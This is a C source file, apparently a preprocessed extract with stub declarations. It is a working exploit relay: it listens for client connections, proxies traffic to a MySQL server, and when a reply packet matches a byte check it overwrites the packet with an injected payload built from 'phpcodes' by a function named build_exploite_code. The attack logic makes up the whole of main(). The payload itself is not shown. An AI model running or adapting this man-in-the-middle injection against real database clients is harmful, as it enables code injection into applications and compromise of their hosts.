
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct timeval {int tv_sec; scalar_t__ tv_usec; } ;
struct sockaddr_in {int dummy; } ;
struct sockaddr {int dummy; } ;
typedef int fd_set ;


 int BUFFER_LEN ;
 char* DATABASE ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int SHUT_RDWR ;
 int accept (int,struct sockaddr*,int*) ;
 int build_exploite_code (char*,int ,char**) ;
 int close (int) ;
 int connect_mysql () ;
 int fprintf (int ,char*,...) ;
 int free (char*) ;
 int listener () ;
 scalar_t__ malloc (int) ;
 int perror (char*) ;
 int phpcodes ;
 size_t read (int,char*,int) ;
 int select (int,int *,int *,int *,int *) ;
 int shutdown (int,int ) ;
 int stderr ;
 scalar_t__ write (int,char*,size_t) ;

int main(int argc,char* argv[])
{
 struct sockaddr_in ina1;
 int ina1_l;
 int s_daemon,s_mysql;
 size_t byte_read,byte_written;
 char *buf;
 int sc,event,n_select;
 fd_set rfds;
        struct timeval tv;
 int exptlen,i;
 char *expt;
 char *dbname=DATABASE;

 buf = (char*) malloc(sizeof(char) * (BUFFER_LEN));
 tv.tv_sec = 15;
 tv.tv_usec = 0;


  s_daemon = listener();

 exptlen = build_exploite_code(dbname,phpcodes,&expt);

 for(;;)
 {
    fprintf(stderr,"waiting for connection\n");

    if( -1 == (sc = accept(s_daemon,(struct sockaddr *) &ina1,&ina1_l)) )
    perror("accept()");

    fprintf(stderr,"got client connection\n");
mysql:

    s_mysql = connect_mysql();

    for(;;)
     {
     FD_ZERO(&rfds);
         FD_SET(sc,&rfds);
       FD_SET(s_mysql,&rfds);

         n_select = (sc > s_mysql)? sc : s_mysql;

      event = select(n_select+1,&rfds,((void*)0),((void*)0),((void*)0));
      if(-1 == event)
      perror("select()");
         else
  {
      if(FD_ISSET(s_mysql,&rfds))
       {
   byte_read = read(s_mysql,buf,BUFFER_LEN);

       if(byte_read == 0)
            {
      shutdown(s_mysql,SHUT_RDWR);
      close(s_mysql);
      goto mysql;
          }






          if( 'T' == buf[11])
   {
             for(i=0;i<exptlen;i++)
                buf[i] = expt[i];
             byte_read = exptlen;
          }

          if(write(sc, buf, byte_read) < 0)
             break;
       }

              if(FD_ISSET(sc,&rfds))
       {
              byte_read = read(sc,buf,BUFFER_LEN);

           if(byte_read == 0)
           {
       close(sc);
       break;
           }

         if(write(s_mysql,buf,byte_read) < 0)
          break;
       }





         }

     }
 }
 free(buf);
 free(expt);
 return 0;
}
